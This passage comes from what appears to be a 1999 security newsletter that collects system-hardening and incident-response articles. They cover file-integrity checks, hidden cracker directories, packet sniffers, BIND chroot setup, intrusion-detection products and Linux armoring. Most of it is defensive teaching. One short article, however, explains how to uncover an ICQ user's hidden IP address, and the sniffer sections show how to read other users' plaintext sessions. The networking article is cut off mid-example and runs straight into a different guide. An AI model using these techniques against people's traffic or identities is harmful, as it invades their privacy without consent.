least one user and changed at least one password. Any file that is different from the original install will show up as modified. Binaries, or compiled programs like netstat, should never show up in this list. Here's the little script. #!/bin/bash # # Run through rpm database and report inconsistencies # for rpmlist in `rpm -qa` # These quotes are back quotes do echo " ----- $rpmlist -----" ; rpm -V $rpmlist done > /tmp/rpmverify.out When you run this script, the output is redirected to the temporary file "/tmp/rpmverify.out". You can use "more" or "less" to view the contents of the file. Since I mentioned that configuration and text files (/etc/passwd, /etc/inetd.conf, etc) will very likely show up as changed when you run this script, how do you know if these are your changes and not those of your cracker? If your system is pristine, or in a state you can be sure of--such as immediately after an install or an upgrade--you can take "fingerprints" of your files, print out the information and refer to it if you suspect something has changed. A way to do this is with md5sum -- those without rpm (Debian, Slackware, etc) can use this method to fingerprint their binaries as well. Here's the way to do it. I'll use a few files, including some binaries. # md5sum /etc/passwd d8439475fac2ea638cbad4fd6ca4bc22 /etc/passwd # md5sum /bin/ps 6d16efee5baecce7a6db7d1e1a088813 /bin/ps # md5sum /bin/netsat b7dda3abd9a1429b23fd8687ad3dd551 /bin/netstat Please note. These are the numbers from my system. You don't want to write these down. The information will vary based on release and what you have in your text and configuration files. Other than the ones mentioned, you might want to check the following. Remember, print the results out and check them from time to time to help you determine if the wily cracker has entered your domain. Here are those files. /usr/bin/passwd /sbin/portmap /bin/login /bin/ls /usr/bin/top /etc/inetd.conf /etc/services This should give you a good starting point. Crackers will not change every file on your system and monitoring a few specific files is enough to give you a good idea as to whether or not something has been changed without your knowledge. Well, it's that time again; the end of another column. Next week, we'll look at the things you can't see after a system has been cracked. Just in case you are starting to wonder if we are going to cover anything other than security, rest assured that security is only one of many concerns for the system and network administrator. Until next week, take care, and happy hunting! Thwarting the System Cracker, Part 5 by Marcel Gagné 22-Oct-1999 Adventures in system administration continue with "Looking for the Invisible." Hello everyone, and welcome back. After last week's article, I received a few panicked e-mails telling me that after using the RPM trick, files like "netstat" and "ls" had actually been modified. The question that followed was fairly obvious: "What now?" You have a fair number of options. Depending on the importance of the system, I will usually recommend taking a backup of the user directories, password and other critical system files, and rebuild the system without these files, using the backup as a reference for the new system. I won't just copy those files back. Our cracker may have hidden things in legitimate places and we don't want to let him back in quite that easily. You can also leave the system alone, tie down the host access with TCP wrappers, shutting down non-essential services, and replacing affected packages. Starting clean is important, but we don't always have that luxury -- not immediately anyway. If you discover that your "procps" or "net-tools" package has been modified by a cracker, the first thing to do is to reinstall the package. Since that package may have been the hole through which your cracker entered, it is usually a good idea to get the latest build from your vendor (RedHat, Caldera, Debian, etc). For the truly paranoid, the fact is that once a cracker has access to your system, they can replace anything, including the very files we use to track down the damage. Like the Shaolin priests in the old TV series, "Kung-Fu", the cracker succeeds by being invisible. Now, let's have a look at those invisible things. Here is a real-life example. After a cracker attack, the machine was tied down, TCP wrappers were installed and all affected packages replaced. It was time to scope out the damage while keeping a close eye on the logs for repeated attempts at break-in. Looking at the /etc/passwd file, I noticed a user that did not belong on the system, "jon." It looked like a normal passwd entry and did not have root privs. With several users on this machine, our cracker hid nicely in the passwd list. When I went to his home directory (/home/jon) and did an "ls -l", all I got was this. . .. .. .bashrc .bash_history .screenrc emech.tar.gz Other than a file called emech.tar.gz, things did not look that strange. Could that be all that was wrong? With a closer look though, you'll notice that there are two ".." directories (pointers to the previous directory in your filesystem hierarchy). That's strange. However, if I change directory to ".." with "cd ..", I just wind up in the /home directory. What's up? What's up is that there is an extra space after the second dot- dot. I can find this out like this. # cd /home/jon # echo .* | cat -v . .. .. .bashrc .bash_history .screenrc emech.tar.gz Look very closely. Notice how each item is seperated by only one space. Now look between the second "dot-dot" and .bashrc. There are actually two spaces which means the directory is actually "dot-dot-space." To get into that directory and have a look around, I do this. # cd ".. " Now an "ls" shows me all this fun stuff. randfiles mech.set mech.pid checkmech cpu.memory mech.help mech.usage mech mech.levels emech.users psdevtab That's interesting. Let's see if jon has any more files hidden around the disk. Using the find command again, I specify a search for files belonging only to this user-id. # find / -user jon -print Aside from what is in the /home/jon directory, I get this partial list. /usr/local/bin/.httpd /tmp/cl /tmp/.l/bcast /tmp/.l/.l /tmp/.l/imapd /tmp/.l/log /tmp/.l/pscan /tmp/.l/pscan.c /tmp/.l/rpc /tmp/.l/slice2 /tmp/.l/sniffer /tmp/.l/sxploit /tmp/.l/thc /tmp/.l/ufs.c Looking a bit more interesting, isn't it? Sniffers. Port scanners. Our cracker was making quite a home for himself. Furthermore, we discovered two other users coming from different hosts with their own files. Our cracker was either operating from different locations with different IDs or he had friends. In doing this search, there were even files belonging to this cracker in legitimate user directories, including one very scary file, something called "tcp.log." This file was several hundred lines long and contained every telnet and ftp login that had come to and from the machine. EVERY ONE! Aside from telling the person whose machine had been broken into that they should rebuild the whole thing from scratch, I also told them to change each and every password, not only on this system but on every system they have access to. Here's the scoop. Part of the information your cracker collects is a list of logins and passwords you use on other systems. Why? So they have an easier time breaking into someone else's system. Every system you have been accessing while your cracker has had access to your system is at risk. You should contact the system administrators of those other systems and inform them of the risk they face. The flip side is that someone logging into your system on a regular basis whose system had been hacked may have give the cracker a valid login and password on your system. Spooky, huh? Here are a few examples to help you search for the hidden and dangerous. For starters, check the user directories for "suid" or "guid" files. These are programs that have an "s" instead of an "x" when you do an ls. For instance, an "ls -l" on /usr/bin/passwd returns this information. -r-s--x--x 1 root root 10704 Apr 14 1999 /usr/bin/passwd The "s" in the fourth position means that the passwd program acts as root when it is being executed. This is necessary in order to allow users to change their passwords. The second "x" is simply and "x," but an "s" in this position would mean that any user in that group would act as that group. Programs that can act as a specific user or group are not a bad thing -- usually. That said, for the most part, no regular (non-administrative) user needs to have root-suid files in their home directories. Look for them this way. The command assumes that your users are created in the /home directory. # find /home -perm -4000 -o -perm -2000 -print What else can we do? Since we want to speed up the process of finding programs and files left behind by our cracker, a quick way to look for hidden directories would be good. This command will show you those. It will also show you things like ".kde" and so on, but you'll also find things like dot-dot-space and dot-dot-dot, perfect hidey-holes for your cracker. # find / -type d -name ".*" -print The "-type d" option means to list directories only. This can be a big list, but it is certainly a smaller one than you would get if you just walked through every file and directory on the system. What's nice here is that your proper dot and dot-dot directories ("." being the current directory and ".." being the parent directory) do not show up in this list. If you see a dot-dot, it will have some other hidden character following it. I've run out of space, so let's sum up. Blowing away everything on your cracked system and starting over is a quick and dirty approach that lets you create a properly secure system right from scratch. Eventually, this is what you should probably do anyhow. If your system must be up, using a new box and making that your new production system is probably the next best bet, but providing a brand new system while you investigate the damage to the old one can be costly. PCs are inexpensive, but not everybody is ready to shell out a few thousand to bring another system online. The catch is this -- your cracker has left a wealth of information behind, information you may need. Getting rid of that information is a bit like getting rid of the evidence. It's tough to do an investigation without evidence. Weigh the costs of either decision, then act. But do act. A quick note of thanks for all the comments I've received on this column, and there have been many. As time goes by, I will try to address those issues that you find important. I'd had some second thoughts about starting the system administration column with something like security, but from the comments, this issue is in the minds of many. Thanks again. Until next week, happy hunting. Thwarting the System Cracker, Part 6 by Marcel Gagné 29-Oct-1999 Do you smell something? An intro to network sniffers. Before we get into today's topic, let me cover a small piece of administrivia. A question that keeps coming up in the feedback letters (yes, we do read those things!) is the one regarding past articles. For recent articles, just click down the News and Information column until you see the link for MORE ARTICLES (all topics) ... . Click there, and you'll be taken to an archive of past articles. One more note: I firmly believe that the best way to beat the cracker is to understand how the cracker works, what his tools are, how they work, and how your system works. It's vital to understand that the tools I present here are for use on your network. As much as I would like to make every reader of this column an expert, there will always be things I miss. Without sounding too paranoid, though, I'd like everyone to walk away from these discussions just a little bit paranoid. Last week, I mentioned in my "real life" example that my cracker was using a sniffer to monitor network traffic and collect user names and passwords. Since I did not go into much detail then, I'll try to clarify what I meant by sniffing. Simply put, a sniffer is a tool that lets you monitor packets as they "fly" across your network interface. You could simply monitor your machine's own traffic, but sniffers use promiscuous mode to scan all packets bound for your network. Allow me to demonstrate. If I run the command ifconfig eth0 on my machine, I get the following output: eth0 Link encap:Ethernet HWaddr 00:C0:4F:E3:C1:8F inet addr:192.168.22.2 Bcast:192.168.22.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49448 errors:0 dropped:0 overruns:0 frame:0 TX packets:33859 errors:0 dropped:0 overruns:0 carrier:0 collisions:6 txqueuelen:100 Interrupt:10 Base address:0x300 Now let's open up a couple of terminal or xterm windows. In one window, we'll start a sniffer program. The one I'm using is called sniffit and I will start it in interactive mode. # sniffit -i In the second window, re-run the ifconfig command and look for the differences. I'll focus on the important line here. UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1 Notice the addition of the word "PROMISC" in this line, short for "promiscuous mode". What that means is your network interface is indiscriminate as to what network traffic is listening for. Normally, your system is capturing only information bound for your IP address. If you put your network interface in promiscuous mode, it will receive all packets on the network. sniffit is a light, curses-based program that will work in a regular terminal window. I obtained my copy from my Linux vendor's contrib ftp site. You can also visit the web site directly at http://reptile.rug.ac.be/~coder/sniffit/sniffit.html. One of the cool things about this package is if you hit return on one of the open sockets in the interactive list, you can watch the plaintext traffic going to and from the user's process. Yes, you can actually see what they are typing. (This almost begs a future column on secure shell, doesn't it?) Another similar product is netwatch. This is also a network monitoring tool that shows you what connections are alive on your network. You can get netwatch from the application home page at http://www.slctech.org/~mackay/netwatch.html or various other sources. Now, if you are busy collecting commands to run as part of your system administration toolkit, you could do worse than to check for interfaces running in promiscuous mode. Simply run the ifconfig command and grep for PROMISC, like this: ifconfig | grep PROMISC By now, if I've made you so scared of loading anything new on your system, but you would still like to try out a sniffer and see what happens, you're in luck. When you installed your Linux system, you probably also installed a little package called tcpdump. While not as flashy as the other two sniffers I mentioned, this little program will do the same thing. If you've ever wondered what goes on across your network, you'll find this enlightening. Here's how to do it. From the command line, type the following: # tcpdump In a few seconds, you should start seeing packets coming from and going to your system. Here's some output from my system. I told tcpdump to watch for traffic coming to and from www.linuxjournal.com. Notice the -l flag. That is to tell tcpdump to show me the output I was busy capturing to a file for later perusal. # tcpdump host www.linuxjournal.com -l | tee /tmp/tcpdump.out This is what the output looked like when I clicked on the web site address: 16:41:49.101002 www2.linuxjournal.com.www > marcel.somedomain.com.1432: F 2303148464:2303148464(0) ack 1998428290 win 16352 16:41:49.101206 marcel.somedomain.com.1432 > www2.linuxjournal.com.www: . ack 1 win 32120 (DF) 16:41:50.001024 www2.linuxjournal.com.www > marcel.somedomain.com.1429: F 1805282316:1805282316(0) ack 1988937134 win 16352 16:41:50.001215 marcel.somedomain.com.1429 > www2.linuxjournal.com.www: . ack 1 win 32120 (DF) 16:41:50.840998 www2.linuxjournal.com.www > marcel.somedomain.com.1431: F 1539885010:1539885010(0) ack 1997163524 win 16352 16:41:50.841198 marcel.somedomain.com.1431 > www2.linuxjournal.com.www: . ack 1 win 32120 (DF) 16:41:51.494356 marcel.somedomain.com.1429 > www2.linuxjournal.com.www: P 1:335(334) ack 1 win 32120 (DF) 16:41:51.497003 marcel.somedomain.com.1433 > www2.linuxjournal.com.www: S 2019129753:2019129753(0) win 32120 (DF) 16:41:51.671023 www2.linuxjournal.com.www > marcel.somedomain.com.1429: R There are many sniffer programs available. Some are stripped-down packages that simply keep track of logins and passwords from any telnet or ftp session. Your cracker may use a modified ps to hide the presence of the sniffer as it logs away the hours. It may also have a perfectly innocent name in the process table, even if your "ps" is fine. Enough with the sniffers and on to other things. Way back when I started this column, I made passing reference to CERT. Carnegie Mellon University runs the CERT Coordination Center (http://www.cert.org). If your system has been cracked, you should consider reporting the incident to CERT. Their web site has extensive security information, and "alerts" describing security issues or software weaknesses. One thing you can and should do is subscribe to the CERT advisories: http://www.cert.org/contact_cert/certmaillist.html Before I wrap up for yet another week, this final note. To the handful of people whose feedback comments were "What if the cracker changes rpm or md5sum?", you now have an understanding of how tricky this whole security business is. My answer to this would be, immediately after installing your system and before you hook up to the Internet, get md5sums of md5sum and rpm, print out the results, and store them for future reference. It's nice to know people are paying attention. Trust nothing but hard copy. Until next week, happy hunting! @HWA 58.0 Crossroads: Linux networking and security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Introduction to Linux Networking and Security by Wei-Mei Shyr and Brian Borowski Congratulations to ACM Crossroads and Wei-Mei Shyr and Brian Borowski! This article was given an Academic Excellence Award by StudyWeb and a link back to this article can be found on the StudyWeb site under the category Computer Science: Operating Systems: Linux Linux is a member of the UNIX family but is different than most UNIX implementations because it provides a great UNIX server/workstation environment at a low cost, can be run on a wide variety of platforms, and contains no proprietary code. In this article, we will give a brief introduction to the IP networking services, how to configure them, and how to set up a relatively secure Linux workstation. Please note that the examples given here are from the Slackware distribution. The paths of the files might be different on other distributions of Linux. Linux TCP/IP Network Services Linux supports a full and high quality implementation of the TCP/IP networking protocols. With a network interface card or a modem and PPP, one can connect a machine to a local area network or the Internet and have access to many additional services and network utilities. Linux provides two methods of establishing host-network services. Servers can either run stand-alone or under the control of a program called inetd. Heavily used services will usually run stand-alone. This means the service does all the management and listening on a socket or port. The most common stand-alone services are inetd, syslogd, portmapper, named, and routed. The file /etc/rc.d/rc.inet2 configures the stand-alone services. Here is an example of /etc/rc.d/rc.inet2 #!/bin/sh # # rc.inet2 This shell script boots up the entire INET system. # Constants. NET="/usr/sbin" IN_SERV="lpd" LPSPOOL="/var/spool/lpd" echo -n "Starting daemons:" # Start the SYSLOGD/Klogd daemons. These must come first. if [ -f ${NET}/syslogd ]; then echo -n " syslogd" ${NET}/syslogd & # Backgrounded to avoid an ugly notice from bash-2.0 echo -n " klogd" ${NET}/klogd fi ... # Start the INET SuperServer if [ -f ${NET}/inetd ]; then echo -n " inetd" ${NET}/inetd else echo "no INETD found. INET cancelled!" exit 1 fi .... However, most services run through inetd. inetd is a daemon or background process that starts up near the beginning of the boot sequence in Linux. inetd listens on many ports, and when a connection to a port is requested, it starts up the process associated with that port. Examples of services run from inetd are ftp, telnet, finger, pop, imap, and mail/smtp. inetd is like a switch-board operator who receives calls at the main number of an organization (the IP address of the machine), and then connects the caller to the extension they have requested (the port or socket). There are two files that configure inetd: /etc/services and /etc/inetd.conf (which may be in /etc/inet/inetd.conf). Below is an example of /etc/inetd.conf # See "man 8 inetd" for more information. # # , writes that if you have custom logging directories specified that you need to be sure to make these as well (/var/log). Although named won't crash, it will complain. Step Four: Add named user and group Add the user named to the /etc/passwd and to the /etc/group files. This will be the UID/GID that the server runs under. You should now go to the /chroot/named/var/run directory and make it writable by named so the named.pid file can be written to upon startup. This is used by the ndc command to control named's operation. At this point you may want to go into your chroot named area and chown -R named.named on the /etc/namedb directory. This allows named to dump cache and statistical information if you send it the proper signal (kill -INT ) . This change should not significantly effect the security of your chroot() setup. Leaving it owned as root won't allow named to write out this information (remember named now runs under a new UID and no longer root), but still allows named to function. A second option is to change the permissions to allow writing to this directory, but leaving it owned by root. This could also work but you need to be careful with doing so to ensure normal users can't modify your named records! IMPORTANT: ** DO NOT USE AN EXISTING UID/GID to run named under (i.e. "nobody"). It is always a bad idea to use an existing UID/GID under a chroot environment as it can impact the protection offered by the service. Make a separate UID/GID for every daemon you run under chroot() as a matter of practice. Step Five: Edit startup scripts 1) Edit /etc/rc and change the named startup line from: echo 'starting named'; named $named_flags To the location of your statically linked binary under the chroot directory: echo 'starting named'; /chroot/named/named $named_flags You now need to enable a syslog socket in your chroot jail so named can write messages to your logs. To do this edit /etc/rc.conf and change the syslogd flags: syslogd_flags="-a /chroot/named/dev/log" (FreeBSD uses '-l' instead of '-a') You will also need to change the startup flags for BIND. Version 8.x has a feature where you can change the user and group ID after binding. This is where you specify your UID/GID you assigned to BIND above. named_flags="-u named -g named -t /chroot/named" 2) BIND 8.1.x ships with a script called "ndc" which is used to control named operations. You will need to edit this file and change the location of the variable PIDFILE from /var/run/named.pid to /chroot/named/var/run/named.pid. BIND 8.2.x and above now makes this a binary and this change won't be necessary any longer. Step Six: Test it out Stop syslogd and named if they running and then from the command line type: syslogd -a /chroot/named/dev/log (FreeBSD uses '-l' instead of '-a') Go into this directory and ls -al. You should see (the date is insignificant): srw-rw-rw- 1 root wheel 0 Jan 01 12:00 log The "s" bit is set to indicate that the file is a socket. This is how named will write to syslog from within the chroot() jail. Now type: /chroot/named/named -u named -g named -t /chroot/named If all goes well named will start and your logs will indicate that named is "Ready to answer queries." Perform other DNS tests as appropriate to ensure operation, then reboot your system and verify the setup. BIND should have started and reported it chroot()ed to to directory and changed UID/GID. You can use a program such as lsof to list out the owner of all network sockets on the host. The owner should be your named UID/GID. When everything is working you should either rename /etc/namedb to something like /etc/namedb.orig and chmod 000 /usr/sbin/named to ensure that the old version doesn't get run by mistake. Reboot your system and assuming everything is correct your named will now be chroot()ed. Thanks Thanks to the following people who made suggestions and submitted corrections: Steinar Haug - Comments concerning blocking of TCP to port 53. Bernhard Weisshuhn - Comments pertaining to Linux install (typos, adding /etc/group entry). Marc Heuse - Comments pertaining to logging and renaming of old binaries and directories. Jan Gruber - Comments pertaining to permissions on /chroot/named/var/run and changes to the ndc control script. Modred - Corrections for FreeBSD and small typo on making /dev/log Robert J. Brown - Corrections in steps five and six where I typed /chroot/named instead of /chroot/named/named to start the binary. Advised about changes to ndc under BIND 8.2. Other Sources Adam Shostack's Home Page - Good reading on various items. http://www.homeport.org/~adam Internet Software Consortium - Suppliers of BIND, INN, and other software. http://www.isc.orgs All Material Copyright ©1996-99 Craig H. Rowland and Psionic Software Systems @HWA 61.0 Getting someone's IP thru ICQ without a hacking proggie ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _|_|_| _| _| _| _| _| _| _| _|_|_| _| _|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_|_| _| _| _| _| _|_|_| _|_|_| _| _|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_|_| _| _| _| _| _| _| _| _| _|_|_| _|_|_| _|_|_| _|_|_| _| _| _|_|_| _|_|_| _|_|_| _|_|_| _| _| _| _| _| _| _| _| _|_|_| _|_|_| _|_| _| _|_| _|_|_| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_|_| _|_|_| _|_|_| http://www.pheces.org presents... Getting someones IP through ICQ without a funkay program ------------------------------------------ Author: X-Arch Disclaimer (who gives a fuk but eh): im not responsible for anything u use this information for...for educational perpose and all that stuff....so just chill and use it for knowledge..=) ----------------------------------------- What are we doin: Ever wanted too get someones IP and the only way is through icq and they have it hidden?...and you dont have any programs on you too do so?....well here we go...very easy trick too get past it and see they'r ip in they'r info... Related txts's: none that i know of How to: Step #1: Connect to icq network....i.e. just load icq and connect Step #2: is the person who u wanna get the ip of online?...if so then simply check they'r icq info...if it is hidden then here we go this is how you get they'r ip... Step #3: simple make sure they are online and then DISCONNECT YOURSELF from ICQ ONLY, i.e. goto icq and then status and click disconnected. Step #4: then WHILe you are offline goto the person who you wanna get the IP of and goto they'r INFO and then they'r LAST ip will be there. So if they are still online you will see they'r IP and there ya go...have fun...=) Method 2 (unstable method): Step #1: Connect to icq...then the person who u wanna get the IP of just send them a msg.... Step #6: When you get a response, goto a DOS prompt and type "netstat"....then look through the generic IP's there and look for something that is coming from a port between 1000-4000 or something of the sort....that should be them sending a msg on that port through ICQ...enjoy...this method is more unstable and not as reliable and more for more advanced users who know how to use netstat properly... well thats it for now....enjoy! (((((((((((((((((((((((((((((((((((#yep))))))))))))))))))))))))))))))))))))) @HWA 62.0 Intrusion detection within a secured network ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Intrusion Detection within a Secured Network This information was provided and written by OptikNerve. This text file describes how to detect an intrusion within a secured network for the system's administrator. The programs that are used in this text file are: RealSecure 3.0, Centrax 2.2, and AXENT NetProwler. Site Resources: www.cybersafe.com - Centrax 2.2 www.axent.com - NetProwler 3.0 www.iss.net - RealSecure 3.0 Introduction to Intrusion Detection Intrusion detection methods are pretty much based on the assumption that an intruder's activity is noticeably different then the regular/usual behavior of a regular user. The distinguishing characteristics characteristics of an ID include the set of parameters they examine and the source of their data. Host-based Intrusion detections are of two different types: application specific and operating system-specific. In both types, an agent generally runs on the server being monitored, and analyzes log files, access records, and application log files. Anomaly detection module which are based on statistical camparisons to normal patterns are typically used on a Host-based systems. In the case of operating system-specific monitors, abnormal sessions, such as unsuccessful logins which are compared to a behavoiral model of normal usage using criteria, such as time of access and the number and types of files created and accessed. Application-specific intrusion detection tools usually define a set of rules describing suspicious activity based on logged events. Generally, these tools don't operate in real time and don't have access to the protocol or other real packet-level information while searching for the patterns of suspicious activity. Network-based intrusion detection monitors have the benifit of potentially analyzing all layers of the network communication. These tools can reside on their own servers, therefore, can eliminate performance hits on the application server(s). They can also use a rule base to describe common attack techniques. Patterns (known as attack signitures), define the sequence of network events that constitute an attack. Attack signatures can be defined dynamically as user-definable patterns or statically as functions within the application. Deploying Intrusion Detection Since intrusion detection operate by analyzing network traffic, the monitors provide protection only for local segments. There are four common deployment strategies: In the he network's DMZ (demilitarized zone)-- Acts to protect devices in that area, such as firewalls from attack. On each critical segment within the intranet-- Detecting intrusions here can help protect against security breaches from within the organization. Just inside the firewall on the intranet-- Provides a means of monitoring a firewall and ensures that there no tunnels through that firewall that are being used to breach the system. On critical hosts-- Sensitive data gains some protection by having intrusion detection agents monitor unusual administrative activities or configuration changes. Most attacks were carried out from within the organization, but this is beginning to change: In various survey's, this statement would be considered false. Right now, the number of internet attacks, are made from internal sources. If you're concerned interdepartmental traffic, the network backbone is another location for an intrusion detection. Network administrators with large modem pools may consider wanting to monitor traffic immediately behind the modems. RealSecure 3.0 RealSecure 3.0 is a member of Internet Security Systems SAFEsuite package of network security software. Other applications include Internet Scanner, a network vulnerability system that checks TCP/IP services, Web servers, and firewalls for specific vulnerabilities or exploits. System Scanner, an operating system-specific vulnerability checker; and Database Scanner, a risk assessment product for Microsoft SQL server and Sybase databases. RealSecure supports two types of detectors: system agents and network engines. Network engines monitor network packets on a segment looking for attack patterns. System agents monitor activity on hosts to determine whether an intruder has gained access to the system. RealSecure is administered from a console application, which communicates with other components using strong authentication. ISS recommends running RealSecure on dedicated hosts. The detectors and console are both memory insensive applications and shouldn't be running together on the same machine. A 300MHz server with 128MB of RAM is recommended for running detectors on NT 4.0. The console should have a 200MHz with 64MB of RAM on NT 4.0. Determining the ammount of disk space can be difficult, and will depend on the volume of traffic and the RealSecure configuration. Security administrators need to determine which events are worth monitoring to prevent excessive use of disk space. The first task with RealSecure is to add detectors to your configuration using the console. Setting up a detector will define the attack signature to monitor, user-defined connection events, user-specified actions, filters, e-mail notifications, and SNMP traps. The detector and consoles communicate using strong encryption methods. Policies specifiying what type of traffic to monitor, the priority of events, and how to detector responds to events. RealSecure uses three types of events: connection, security and user defined filter. Security events use a static set of attack signatures to recognize suspicious activity that might be comming from an intruder. Connection events recognize connections through particular ports, from certain addresses, or with a certain type of protocol. User-defined filters allow the detectors to ignore particular kinds of traffic, based on the protocol, source and the destination IP addresses, and the source and its destination ports. When an event is detected, an action is carried out. RealSecure supports 10 types of actions; the most important are logging summary information, logging raw data, sending e-mail notification, killing a session, locking the firewall, viewing a session, and running user-defined actions. Sessions are killed by sending a TCP reset command to both parties. Locking the firewall sends a command to the firewall to block traffic from the offending source IP address for a specified period of time. Viewing a session allows a security manager to monitor communications if real time. User-provided executables carry out user-defined actions. Centrax Centrax 2.2 is an integrated host- and network based intrusion detection with the vulnerability assessment and policy management features that was made by CyberSafe. Centrax consists of a Command Console and target services. As with RealSecure, the console lets security managers monitor and configure the intrusion detection software. The console runs on an NT server; the target services can run on both Solaris and NT systems. CyberSafe recommends that the Console is run on atleast a 166MHz with 64MB of RAM. Target services can run on NT Workstation or Server 3.51 or 4.0 with atleast a 486 processor and 32MB of RAM. Around 50 or more attack signatures are provided for Solaris and around 80 signatures are provided for NT. Monthly updates to the attack signature set are avialable from the CyberSafe website. As with RealSecure, administrators can sonfigure the responses to an event(s) and shut down the system, log off the user, or even disable the account. The attack signatures cover a range of objects and activities, including audit and administrative activities, critical system objects, decoy files, password changes, administrative groups, and user administration. Since this includes a host-based system, there will be some performance penalty which will be around two to five percent when optimally configured-- unlike configured network-based systems that require a dedicated system and monitor traffic. Another difference between network- and host-based systems, such as Centrax, is that the latter belong within the intranet, not on the permineter of the network. The Centrax 2.2 Console is made up of serveral components. Target Agents communicates with target services to distribute audit and collection policies, along with gathering status information from the services. Assessment Manager evaluates security vulnerabilities, such as problem with guest accounts and administrative privileges. Alert Manager notifies security managers of a detected intrusion/threat. Detection Policy Editor is used to define the list of potential attacks to watch for and means of notification. Gathering data from the target services is run by policies defined in the Collection Policy Editor. Last, the Report Manager provides forensic analysis and detailed reports of the current system(s) activities. AXENT NetProwler AXNET NetProwler is a network-based intrusion detection tool that lets users define custom signatures. Initially configured with more then 200 well-known attack profiles/signatures which include: port scanning, denial of service, TCP sequence number spoofing, and IP address spoofing. NetProwler provides a GUI tool that lets users create attck signatures for less common types of attacks, such as attempts to an Oracle database and more. In addition, NetProwler provides other network management tools, which include consistency check for DNS server tables, Web and FTP daemon content, time-of-day access restrictions, and inactive session purging. NetProwler, similar to RealSecure and Centrax, uses a combination of centralized management, distributed collection and detection agents, and data repository. The NetProwler console is a Java-based tool, that runs from a Web browser. The centralized data repository supports Microsoft Access and SQL daemons. As like the other tools, administrators can configure their own systems to monitor activity and review attack signatures from the console. The most distinguishing characteristic that NetProwler provides is its ability to define custom attack signatures using an attack signature wizard. Stateful Signature Inspection (SDSI) comprises a virtual processor, an intrusion set for defining attack signatures, and a cache for maintaining the state of connections monitored by the processor. When a packet is processed, the previously gathered information on the cache, and attack signature definitions are executed on the virtual processor. When an attack pattern is found, the actions associated with the attack are executed. Since attack signatures are data-driven, you are allowed to add new ones in real time. AXNET maintains an Internet Security team, which researches new threats and vulnerabilities then they publishe attack signatures that can be downloaded as needed. A graphical user interface is used to configure and monitor the system, allowing administrators to monitor both network-based and host-based intrusion detection systems across the network. When first installed, NetProwler analyzes traffic on the network, and examines hosts on the segment to determine the attack profiles that should be loaded. This assessment also includes discovery of popular systems and applications. At any point, after the installation, an administrator can add custom attack signatures using a drag-and-drop tool. Three types of attacks can be defined: 1-off attack, such as a LAND attack that sets the source and destination address of the packet the same address is done with a single transmission. Sequential or low-level attack, in which there's a series of exchanges between the server and the client. counter-based attack, such as 20 queries to the same database lookup page, can be blocked, based on the number of times a pattern appears in the stream of network traffic. All three types are defined by using keywords; for example, TCP Stack, and a set of predefined expressions, such as conditional statements. Protecting User Privacy PlanetAll, provides a Web-Based contact management repository for its clients. Users can define address books and link to other PlanetAll users sharing scheduling and address information. They have a strict policy of safeguarding a user's privacy, believing that contact information should be completely private, and its shared only when users explicitly choose to share it. As part of the overall security plan for protecting customer information, PlanetAll uses NetProwler. On the downside, NetProwler, and network-based detection mechanisms in general, don't work on switched networks since traffic isn't broadcasted through the entire segment. To provide NetProwler with access to the entire traffic stream, PlanetAll had to place its server outside the sweitched network segment. Conclusion Intrusion detection is another type of security tool that IT managers must create to protect their information resources. Intrusion detection complements firewalls by allowing a higher level of analsis of traffic on a network, and by monitoring its behavior of the sessions on the servers. Network-based detection allows access to the entire OSI stack, but is limited on switch networks and Virtual Private Networks because of encryption reasons. Host-based intrusion detection systems provide a more operating specific monitoring, but can't protect against low-level attacks such as a denial-of-service attack. Intrusion detection vendors have known of the limitation of these approaches and are now offering multiple programs, such as NetProwler's host-based counterpart from AXENT, Intruder Alert, to provide more accurate coverage and logs. Copyright Secure System Admistrating Research, 1999 all rights reserved. @HWA 63.0 Preparing your Linux box for the internet: Armoring Linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Preparing your linux box for the Internet Armoring Linux Lance Spitzner Last Modified: 23 June, 1999 Organizations throughout the world are adopting Linux as their production platform. By connecting to the Internet to provide critical services, they also become targets of opportunity. To help protect these Linux systems, this article covers the basics of securing a Linux box. The examples provided here are based on Red Hat 5.x, but should apply to most Linux distributions. Installation The best place to start in armoring your system is at the beginning, OS installation. Since this is a production system, you cannot trust any previous installations. You want to start with a clean installation, where you can guarantee the system integrity. Place your system in an isolated network. At no time do you want to connect this box to an active network nor the Internet, exposing the system to a possible compromise. I personally witnessed a system hacked by a script kiddie within 15 minutes of connecting to the Internet. To get critical files and patches later, you will need a second box that acts as a go between. This second box will download files from the Internet, then connect to your isolated, configuration "network" to transfer critical files. Once you have placed your future Linux box in an isolated network, you are ready to begin. The first step is selecting what OS package to load. The idea is to load the minimum installation, while maintaining maximum efficiency. Chose the installation that suits your needs, but deselect package you will not be using. The less software that resides on the box, the fewer potential security exploits or holes. This means if you do not need the News or Real Audio Server, don't install it. The nice thing about Linux is it is easy to add packages later. Regardless of which installation you choose, I would add the manual pages and HOWTO docs. I find the on-line man pages and docs to be a critical resource that add little risk to your system. During the installation process, you will be asked to partition your system. I always like to make root as big as possible and just throw everything in there, then you do not run out of room in the future. However, we do need several partitions to protect the root drive. If we were to fill the root partition with data, such as logging or email, we would cause a denial of service, potentially crashing the system. Therefore, I always recommend a separate partition for /var, this is where all the system logging and email goes. By isolating the /var partition, you protect your root partition from overfilling. I've found 400 MB to be more then enough for /var. You may also consider making a separate partition for specific application purposes, especially applications that store extensive logging. With such a setup, your partitions would look as follows: / - everything else /var - 200 MB swap - (max 127 MB of RAM) Once the system has rebooted after the installation, be sure to install the recommend security patches. For Red Hat, you can find these security patches at http://www.redhat.com/support. An excellent example of this is the security update for wu-ftpd Without these patches, your system can be easily compromised. Be sure to use your go between box to get the patches, the Linux box should always remain on an isolated network. Patches are critical to armoring a system and should always be updated. BUGTRAQ@netspace.org is an excellent source for following bugs and system patches. For Red Hat, once you download the rpm, you can easily update your system using the following syntax. rpm -Uvh wu-ftpd-2.4.2b18-2.1.i386.rpm For systems that are already 